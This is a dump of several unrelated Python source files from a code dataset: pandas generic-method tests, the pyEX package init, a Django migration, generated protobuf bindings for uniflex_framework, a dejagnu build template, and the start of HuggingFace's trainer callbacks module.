tm.assert_series_equal(df.squeeze(), df["A"])
# don't fail with 0 length dimensions GH11229 & GH8999
empty_series = Series([], name="five", dtype=np.float64)
empty_frame = DataFrame([empty_series])
tm.assert_series_equal(empty_series, empty_series.squeeze())
tm.assert_series_equal(empty_series, empty_frame.squeeze())
# axis argument
df = tm.makeTimeDataFrame(nper=1).iloc[:, :1]
assert df.shape == (1, 1)
tm.assert_series_equal(df.squeeze(axis=0), df.iloc[0])
tm.assert_series_equal(df.squeeze(axis="index"), df.iloc[0])
tm.assert_series_equal(df.squeeze(axis=1), df.iloc[:, 0])
tm.assert_series_equal(df.squeeze(axis="columns"), df.iloc[:, 0])
assert df.squeeze() == df.iloc[0, 0]
msg = "No axis named 2 for object type DataFrame"
with pytest.raises(ValueError, match=msg):
df.squeeze(axis=2)
msg = "No axis named x for object type DataFrame"
with pytest.raises(ValueError, match=msg):
df.squeeze(axis="x")
df = tm.makeTimeDataFrame(3)
tm.assert_frame_equal(df.squeeze(axis=0), df)
def test_numpy_squeeze(self):
s = tm.makeFloatSeries()
tm.assert_series_equal(np.squeeze(s), s)
df = tm.makeTimeDataFrame().reindex(columns=["A"])
tm.assert_series_equal(np.squeeze(df), df["A"])
def test_transpose(self):
for s in [tm.makeFloatSeries(), tm.makeStringSeries(), tm.makeObjectSeries()]:
# calls implementation in pandas/core/base.py
tm.assert_series_equal(s.transpose(), s)
for df in [tm.makeTimeDataFrame()]:
tm.assert_frame_equal(df.transpose().transpose(), df)
def test_numpy_transpose(self):
msg = "the 'axes' parameter is not supported"
s = tm.makeFloatSeries()
tm.assert_series_equal(np.transpose(s), s)
with pytest.raises(ValueError, match=msg):
np.transpose(s, axes=1)
df = tm.makeTimeDataFrame()
tm.assert_frame_equal(np.transpose(np.transpose(df)), df)
with pytest.raises(ValueError, match=msg):
np.transpose(df, axes=1)
def test_take(self):
indices = [1, 5, -2, 6, 3, -1]
for s in [tm.makeFloatSeries(), tm.makeStringSeries(), tm.makeObjectSeries()]:
out = s.take(indices)
expected = Series(
data=s.values.take(indices), index=s.index.take(indices), dtype=s.dtype
)
tm.assert_series_equal(out, expected)
for df in [tm.makeTimeDataFrame()]:
out = df.take(indices)
expected = DataFrame(
data=df.values.take(indices, axis=0),
index=df.index.take(indices),
columns=df.columns,
)
tm.assert_frame_equal(out, expected)
def test_take_invalid_kwargs(self):
indices = [-3, 2, 0, 1]
s = tm.makeFloatSeries()
df = tm.makeTimeDataFrame()
for obj in (s, df):
msg = r"take\(\) got an unexpected keyword argument 'foo'"
with pytest.raises(TypeError, match=msg):
obj.take(indices, foo=2)
msg = "the 'out' parameter is not supported"
with pytest.raises(ValueError, match=msg):
obj.take(indices, out=indices)
msg = "the 'mode' parameter is not supported"
with pytest.raises(ValueError, match=msg):
obj.take(indices, mode="clip")
@pytest.mark.parametrize("is_copy", [True, False])
def test_depr_take_kwarg_is_copy(self, is_copy):
# GH 27357
df = DataFrame({"A": [1, 2, 3]})
msg = (
"is_copy is deprecated and will be removed in a future version. "
"'take' always returns a copy, so there is no need to specify this."
)
with tm.assert_produces_warning(FutureWarning) as w:
df.take([0, 1], is_copy=is_copy)
assert w[0].message.args[0] == msg
s = Series([1, 2, 3])
with tm.assert_produces_warning(FutureWarning):
s.take([0, 1], is_copy=is_copy)
def test_equals(self):
s1 = pd.Series([1, 2, 3], index=[0, 2, 1])
s2 = s1.copy()
assert s1.equals(s2)
s1[1] = 99
assert not s1.equals(s2)
# NaNs compare as equal
s1 = pd.Series([1, np.nan, 3, np.nan], index=[0, 2, 1, 3])
s2 = s1.copy()
assert s1.equals(s2)
s2[0] = 9.9
assert not s1.equals(s2)
idx = MultiIndex.from_tuples([(0, "a"), (1, "b"), (2, "c")])
s1 = Series([1, 2, np.nan], index=idx)
s2 = s1.copy()
assert s1.equals(s2)
# Add object dtype column with nans
index = np.random.random(10)
df1 = DataFrame(np.random.random(10), index=index, columns=["floats"])
df1["text"] = "the sky is so blue. we could use more chocolate.".split()
df1["start"] = date_range("2000-1-1", periods=10, freq="T")
df1["end"] = date_range("2000-1-1", periods=10, freq="D")
df1["diff"] = df1["end"] - df1["start"]
df1["bool"] = np.arange(10) % 3 == 0
df1.loc[::2] = np.nan
df2 = df1.copy()
assert df1["text"].equals(df2["text"])
assert df1["start"].equals(df2["start"])
assert df1["end"].equals(df2["end"])
assert df1["diff"].equals(df2["diff"])
assert df1["bool"].equals(df2["bool"])
assert df1.equals(df2)
assert not df1.equals(object)
# different dtype
different = df1.copy()
different["floats"] = different["floats"].astype("float32")
assert not df1.equals(different)
# different index
different_index = -index
different = df2.set_index(different_index)
assert not df1.equals(different)
# different columns
different = df2.copy()
different.columns = df2.columns[::-1]
assert not df1.equals(different)
# DatetimeIndex
index = pd.date_range("2000-1-1", periods=10, freq="T")
df1 = df1.set_index(index)
df2 = df1.copy()
assert df1.equals(df2)
# MultiIndex
df3 = df1.set_index(["text"], append=True)
df2 = df1.set_index(["text"], append=True)
assert df3.equals(df2)
df2 = df1.set_index(["floats"], append=True)
assert not df3.equals(df2)
# NaN in index
df3 = df1.set_index(["floats"], append=True)
df2 = df1.set_index(["floats"], append=True)
assert df3.equals(df2)
# GH 8437
a = pd.Series([False, np.nan])
b = pd.Series([False, np.nan])
c = pd.Series(index=range(2), dtype=object)
d = c.copy()
e = c.copy()
f = c.copy()
c[:-1] = d[:-1] = e[0] = f[0] = False
assert a.equals(a)
assert a.equals(b)
assert a.equals(c)
assert a.equals(d)
assert a.equals(e)
assert e.equals(f)
def test_pipe(self):
df = DataFrame({"A": [1, 2, 3]})
f = lambda x, y: x ** y
result = df.pipe(f, 2)
expected = DataFrame({"A": [1, 4, 9]})
tm.assert_frame_equal(result, expected)
result = df.A.pipe(f, 2)
tm.assert_series_equal(result, expected.A)
def test_pipe_tuple(self):
df = DataFrame({"A": [1, 2, 3]})
f = lambda x, y: y
result = df.pipe((f, "y"), 0)
tm.assert_frame_equal(result, df)
result = df.A.pipe((f, "y"), 0)
tm.assert_series_equal(result, df.A)
def test_pipe_tuple_error(self):
df = DataFrame({"A": [1, 2, 3]})
f = lambda x, y: y
with pytest.raises(ValueError):
df.pipe((f, "y"), x=1, y=0)
with pytest.raises(ValueError):
df.A.pipe((f, "y"), x=1, y=0)
@pytest.mark.parametrize("box", [pd.Series, pd.DataFrame])
def test_axis_classmethods(self, box):
obj = box(dtype=object)
values = (
list(box._AXIS_NAMES.keys())
+ list(box._AXIS_NUMBERS.keys())
+ list(box._AXIS_ALIASES.keys())
)
for v in values:
assert obj._get_axis_number(v) == box._get_axis_number(v)
assert obj._get_axis_name(v) == box._get_axis_name(v)
assert obj._get_block_manager_axis(v) == box._get_block_manager_axis(v)
|
py | 1a4a0c617019e781a0862a95b925c40823663703 | # *****************************************************************************
#
# Copyright (c) 2020, the pyEX authors.
#
# This file is part of the pyEX library, distributed under the terms of
# the Apache License 2.0. The full license can be found in the LICENSE file.
#
from .common import (
PyEXception,
PyEXStopSSE,
overrideUrl,
setProxy,
)
from ._version import __version__
from .account import *
from .alternative import *
from .commodities import *
from .cryptocurrency import *
from .economic import *
from .files import *
from .fx import *
from .markets import *
from .metadata import *
from .mortgage import *
from .options import *
from .points import *
from .premium import *
from .rates import *
from .refdata import *
from .rules import create, delete, lookup
from .rules import output as ruleOutput
from .rules import pause, resume
from .rules import rule as ruleInfo
from .rules import rules, schema
from .stats import *
from .stocks import *
from .streaming.cryptocurrency import *
from .streaming.fx import *
from .streaming.news import *
from .streaming.sentiment import *
from .streaming.sse import *
from .streaming.stock import *
from .streaming.ws import *
from .timeseries import *
from .treasuries import *
from .client import * # noqa: F403
from .studies import * # noqa: F403
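# optional integrations below are skipped when their extra dependencies are not installed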
try:
from .caching import *
except ImportError:
pass
try:
from .zipline import *
except ImportError:
pass
|
py | 1a4a0ca2246a98461fbca04321decda07e722f1f | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('image_collection', '0006_imageslide_data_class'),
]
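    # add mobile visibility and mobile link fields to the ImageSlide model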
operations = [
migrations.AddField(
model_name='imageslide',
name='is_visible_on_mobile',
field=models.BooleanField(default=False),
),
migrations.AddField(
model_name='imageslide',
name='mobile_link',
            field=models.CharField(help_text='i.e. "{route: "shop/category", categoryName: "artworks"}"', max_length=4000, verbose_name='mobile link', blank=True),
),
]
|
py | 1a4a0d476342e84df70e1210fe85f025831006d9 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: messages.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='messages.proto',
package='uniflex_framework',
serialized_pb=_b('\n\x0emessages.proto\x12\x11uniflex_framework\"\x19\n\tAttribute\x12\x0c\n\x04name\x18\x01 \x02(\t\"\x18\n\x08\x46unction\x12\x0c\n\x04name\x18\x01 \x02(\t\"\x15\n\x05\x45vent\x12\x0c\n\x04name\x18\x01 \x02(\t\"\x17\n\x07Service\x12\x0c\n\x04name\x18\x01 \x02(\t\"\x16\n\x06\x44\x65vice\x12\x0c\n\x04name\x18\x01 \x02(\t\"\xa5\x03\n\x06Module\x12\x0c\n\x04uuid\x18\x01 \x02(\t\x12\x0c\n\x04name\x18\x02 \x02(\t\x12\x32\n\x04type\x18\x03 \x02(\x0e\x32$.uniflex_framework.Module.ModuleType\x12)\n\x06\x64\x65vice\x18\x04 \x01(\x0b\x32\x19.uniflex_framework.Device\x12\x30\n\nattributes\x18\x05 \x03(\x0b\x32\x1c.uniflex_framework.Attribute\x12.\n\tfunctions\x18\x06 \x03(\x0b\x32\x1b.uniflex_framework.Function\x12+\n\tin_events\x18\x07 \x03(\x0b\x32\x18.uniflex_framework.Event\x12,\n\nout_events\x18\x08 \x03(\x0b\x32\x18.uniflex_framework.Event\x12,\n\x08services\x18\t \x03(\x0b\x32\x1a.uniflex_framework.Service\"5\n\nModuleType\x12\n\n\x06MODULE\x10\x00\x12\n\n\x06\x44\x45VICE\x10\x01\x12\x0f\n\x0b\x41PPLICATION\x10\x02\"\xe4\x01\n\x0bNodeInfoMsg\x12\x12\n\nagent_uuid\x18\x01 \x02(\t\x12\n\n\x02ip\x18\x02 \x02(\t\x12\x0c\n\x04name\x18\x03 \x02(\t\x12\x10\n\x08hostname\x18\x04 \x02(\t\x12\x0c\n\x04info\x18\x05 \x01(\t\x12*\n\x07\x64\x65vices\x18\x06 \x03(\x0b\x32\x19.uniflex_framework.Module\x12*\n\x07modules\x18\x07 \x03(\x0b\x32\x19.uniflex_framework.Module\x12/\n\x0c\x61pplications\x18\x08 \x03(\x0b\x32\x19.uniflex_framework.Module\"%\n\x0fNodeInfoRequest\x12\x12\n\nagent_uuid\x18\x01 \x02(\t\")\n\x13NodeAddNotification\x12\x12\n\nagent_uuid\x18\x01 \x02(\t\"1\n\x0bNodeExitMsg\x12\x12\n\nagent_uuid\x18\x01 \x02(\t\x12\x0e\n\x06reason\x18\x02 \x01(\t\")\n\x08HelloMsg\x12\x0c\n\x04uuid\x18\x01 \x02(\t\x12\x0f\n\x07timeout\x18\x02 \x02(\r')
)
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_MODULE_MODULETYPE = _descriptor.EnumDescriptor(
name='ModuleType',
full_name='uniflex_framework.Module.ModuleType',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='MODULE', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DEVICE', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='APPLICATION', index=2, number=2,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=531,
serialized_end=584,
)
_sym_db.RegisterEnumDescriptor(_MODULE_MODULETYPE)
_ATTRIBUTE = _descriptor.Descriptor(
name='Attribute',
full_name='uniflex_framework.Attribute',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='uniflex_framework.Attribute.name', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=37,
serialized_end=62,
)
_FUNCTION = _descriptor.Descriptor(
name='Function',
full_name='uniflex_framework.Function',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='uniflex_framework.Function.name', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=64,
serialized_end=88,
)
_EVENT = _descriptor.Descriptor(
name='Event',
full_name='uniflex_framework.Event',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='uniflex_framework.Event.name', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=90,
serialized_end=111,
)
_SERVICE = _descriptor.Descriptor(
name='Service',
full_name='uniflex_framework.Service',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='uniflex_framework.Service.name', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=113,
serialized_end=136,
)
_DEVICE = _descriptor.Descriptor(
name='Device',
full_name='uniflex_framework.Device',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='uniflex_framework.Device.name', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=138,
serialized_end=160,
)
_MODULE = _descriptor.Descriptor(
name='Module',
full_name='uniflex_framework.Module',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='uuid', full_name='uniflex_framework.Module.uuid', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='name', full_name='uniflex_framework.Module.name', index=1,
number=2, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='type', full_name='uniflex_framework.Module.type', index=2,
number=3, type=14, cpp_type=8, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='device', full_name='uniflex_framework.Module.device', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='attributes', full_name='uniflex_framework.Module.attributes', index=4,
number=5, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='functions', full_name='uniflex_framework.Module.functions', index=5,
number=6, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='in_events', full_name='uniflex_framework.Module.in_events', index=6,
number=7, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='out_events', full_name='uniflex_framework.Module.out_events', index=7,
number=8, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='services', full_name='uniflex_framework.Module.services', index=8,
number=9, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
_MODULE_MODULETYPE,
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=163,
serialized_end=584,
)
_NODEINFOMSG = _descriptor.Descriptor(
name='NodeInfoMsg',
full_name='uniflex_framework.NodeInfoMsg',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='agent_uuid', full_name='uniflex_framework.NodeInfoMsg.agent_uuid', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='ip', full_name='uniflex_framework.NodeInfoMsg.ip', index=1,
number=2, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='name', full_name='uniflex_framework.NodeInfoMsg.name', index=2,
number=3, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='hostname', full_name='uniflex_framework.NodeInfoMsg.hostname', index=3,
number=4, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='info', full_name='uniflex_framework.NodeInfoMsg.info', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='devices', full_name='uniflex_framework.NodeInfoMsg.devices', index=5,
number=6, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='modules', full_name='uniflex_framework.NodeInfoMsg.modules', index=6,
number=7, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='applications', full_name='uniflex_framework.NodeInfoMsg.applications', index=7,
number=8, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=587,
serialized_end=815,
)
_NODEINFOREQUEST = _descriptor.Descriptor(
name='NodeInfoRequest',
full_name='uniflex_framework.NodeInfoRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='agent_uuid', full_name='uniflex_framework.NodeInfoRequest.agent_uuid', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=817,
serialized_end=854,
)
_NODEADDNOTIFICATION = _descriptor.Descriptor(
name='NodeAddNotification',
full_name='uniflex_framework.NodeAddNotification',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='agent_uuid', full_name='uniflex_framework.NodeAddNotification.agent_uuid', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=856,
serialized_end=897,
)
_NODEEXITMSG = _descriptor.Descriptor(
name='NodeExitMsg',
full_name='uniflex_framework.NodeExitMsg',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='agent_uuid', full_name='uniflex_framework.NodeExitMsg.agent_uuid', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='reason', full_name='uniflex_framework.NodeExitMsg.reason', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=899,
serialized_end=948,
)
_HELLOMSG = _descriptor.Descriptor(
name='HelloMsg',
full_name='uniflex_framework.HelloMsg',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='uuid', full_name='uniflex_framework.HelloMsg.uuid', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='timeout', full_name='uniflex_framework.HelloMsg.timeout', index=1,
number=2, type=13, cpp_type=3, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=950,
serialized_end=991,
)
_MODULE.fields_by_name['type'].enum_type = _MODULE_MODULETYPE
_MODULE.fields_by_name['device'].message_type = _DEVICE
_MODULE.fields_by_name['attributes'].message_type = _ATTRIBUTE
_MODULE.fields_by_name['functions'].message_type = _FUNCTION
_MODULE.fields_by_name['in_events'].message_type = _EVENT
_MODULE.fields_by_name['out_events'].message_type = _EVENT
_MODULE.fields_by_name['services'].message_type = _SERVICE
_MODULE_MODULETYPE.containing_type = _MODULE
_NODEINFOMSG.fields_by_name['devices'].message_type = _MODULE
_NODEINFOMSG.fields_by_name['modules'].message_type = _MODULE
_NODEINFOMSG.fields_by_name['applications'].message_type = _MODULE
DESCRIPTOR.message_types_by_name['Attribute'] = _ATTRIBUTE
DESCRIPTOR.message_types_by_name['Function'] = _FUNCTION
DESCRIPTOR.message_types_by_name['Event'] = _EVENT
DESCRIPTOR.message_types_by_name['Service'] = _SERVICE
DESCRIPTOR.message_types_by_name['Device'] = _DEVICE
DESCRIPTOR.message_types_by_name['Module'] = _MODULE
DESCRIPTOR.message_types_by_name['NodeInfoMsg'] = _NODEINFOMSG
DESCRIPTOR.message_types_by_name['NodeInfoRequest'] = _NODEINFOREQUEST
DESCRIPTOR.message_types_by_name['NodeAddNotification'] = _NODEADDNOTIFICATION
DESCRIPTOR.message_types_by_name['NodeExitMsg'] = _NODEEXITMSG
DESCRIPTOR.message_types_by_name['HelloMsg'] = _HELLOMSG
Attribute = _reflection.GeneratedProtocolMessageType('Attribute', (_message.Message,), dict(
DESCRIPTOR = _ATTRIBUTE,
__module__ = 'messages_pb2'
# @@protoc_insertion_point(class_scope:uniflex_framework.Attribute)
))
_sym_db.RegisterMessage(Attribute)
Function = _reflection.GeneratedProtocolMessageType('Function', (_message.Message,), dict(
DESCRIPTOR = _FUNCTION,
__module__ = 'messages_pb2'
# @@protoc_insertion_point(class_scope:uniflex_framework.Function)
))
_sym_db.RegisterMessage(Function)
Event = _reflection.GeneratedProtocolMessageType('Event', (_message.Message,), dict(
DESCRIPTOR = _EVENT,
__module__ = 'messages_pb2'
# @@protoc_insertion_point(class_scope:uniflex_framework.Event)
))
_sym_db.RegisterMessage(Event)
Service = _reflection.GeneratedProtocolMessageType('Service', (_message.Message,), dict(
DESCRIPTOR = _SERVICE,
__module__ = 'messages_pb2'
# @@protoc_insertion_point(class_scope:uniflex_framework.Service)
))
_sym_db.RegisterMessage(Service)
Device = _reflection.GeneratedProtocolMessageType('Device', (_message.Message,), dict(
DESCRIPTOR = _DEVICE,
__module__ = 'messages_pb2'
# @@protoc_insertion_point(class_scope:uniflex_framework.Device)
))
_sym_db.RegisterMessage(Device)
Module = _reflection.GeneratedProtocolMessageType('Module', (_message.Message,), dict(
DESCRIPTOR = _MODULE,
__module__ = 'messages_pb2'
# @@protoc_insertion_point(class_scope:uniflex_framework.Module)
))
_sym_db.RegisterMessage(Module)
NodeInfoMsg = _reflection.GeneratedProtocolMessageType('NodeInfoMsg', (_message.Message,), dict(
DESCRIPTOR = _NODEINFOMSG,
__module__ = 'messages_pb2'
# @@protoc_insertion_point(class_scope:uniflex_framework.NodeInfoMsg)
))
_sym_db.RegisterMessage(NodeInfoMsg)
NodeInfoRequest = _reflection.GeneratedProtocolMessageType('NodeInfoRequest', (_message.Message,), dict(
DESCRIPTOR = _NODEINFOREQUEST,
__module__ = 'messages_pb2'
# @@protoc_insertion_point(class_scope:uniflex_framework.NodeInfoRequest)
))
_sym_db.RegisterMessage(NodeInfoRequest)
NodeAddNotification = _reflection.GeneratedProtocolMessageType('NodeAddNotification', (_message.Message,), dict(
DESCRIPTOR = _NODEADDNOTIFICATION,
__module__ = 'messages_pb2'
# @@protoc_insertion_point(class_scope:uniflex_framework.NodeAddNotification)
))
_sym_db.RegisterMessage(NodeAddNotification)
NodeExitMsg = _reflection.GeneratedProtocolMessageType('NodeExitMsg', (_message.Message,), dict(
DESCRIPTOR = _NODEEXITMSG,
__module__ = 'messages_pb2'
# @@protoc_insertion_point(class_scope:uniflex_framework.NodeExitMsg)
))
_sym_db.RegisterMessage(NodeExitMsg)
HelloMsg = _reflection.GeneratedProtocolMessageType('HelloMsg', (_message.Message,), dict(
DESCRIPTOR = _HELLOMSG,
__module__ = 'messages_pb2'
# @@protoc_insertion_point(class_scope:uniflex_framework.HelloMsg)
))
_sym_db.RegisterMessage(HelloMsg)
# @@protoc_insertion_point(module_scope)
|
py | 1a4a0dd0115ddc796492450b61728b896da0e787 | pkgname = "dejagnu"
pkgver = "1.6.3"
pkgrel = 0
build_style = "gnu_configure"
make_cmd = "gmake"
hostmakedepends = ["gmake", "expect-devel"]
makedepends = ["expect-devel"]
depends = ["expect"]
pkgdesc = "Framework for running test suites on GNU tools"
maintainer = "q66 <[email protected]>"
license = "GPL-3.0-or-later"
url = "http://www.gnu.org/software/dejagnu"
source = f"$(GNU_SITE)/{pkgname}/{pkgname}-{pkgver}.tar.gz"
sha256 = "87daefacd7958b4a69f88c6856dbd1634261963c414079d0c371f589cd66a2e3"
# like 4 tests fail and it's impossible to tell what is going on
options = ["!check"] |
py | 1a4a0eae75c37a941158b11a56a14c2cd1d97ae8 | # coding=utf-8
# Copyright 2020-present the HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Callbacks to use with the Trainer class and customize the training loop.
"""
import collections
import dataclasses
import json
from dataclasses import dataclass
from typing import Dict, List, Optional, Union
import numpy as np
from tqdm.auto import tqdm
from .trainer_utils import IntervalStrategy
from .training_args import TrainingArguments
from .utils import logging
logger = logging.get_logger(__name__)
@dataclass
class TrainerState:
"""
A class containing the [`Trainer`] inner state that will be saved along the model and optimizer
when checkpointing and passed to the [`TrainerCallback`].
<Tip>
In all this class, one step is to be understood as one update step. When using gradient accumulation, one
update step may require several forward and backward passes: if you use `gradient_accumulation_steps=n`,
then one update step requires going through *n* batches.
</Tip>
Args:
epoch (`float`, *optional*):
Only set during training, will represent the epoch the training is at (the decimal part being the
percentage of the current epoch completed).
global_step (`int`, *optional*, defaults to 0):
During training, represents the number of update steps completed.
max_steps (`int`, *optional*, defaults to 0):
The number of update steps to do during the current training.
total_flos (`float`, *optional*, defaults to 0):
            The total number of floating-point operations done by the model since the beginning of training (stored as floats
to avoid overflow).
log_history (`List[Dict[str, float]]`, *optional*):
The list of logs done since the beginning of training.
best_metric (`float`, *optional*):
When tracking the best model, the value of the best metric encountered so far.
best_model_checkpoint (`str`, *optional*):
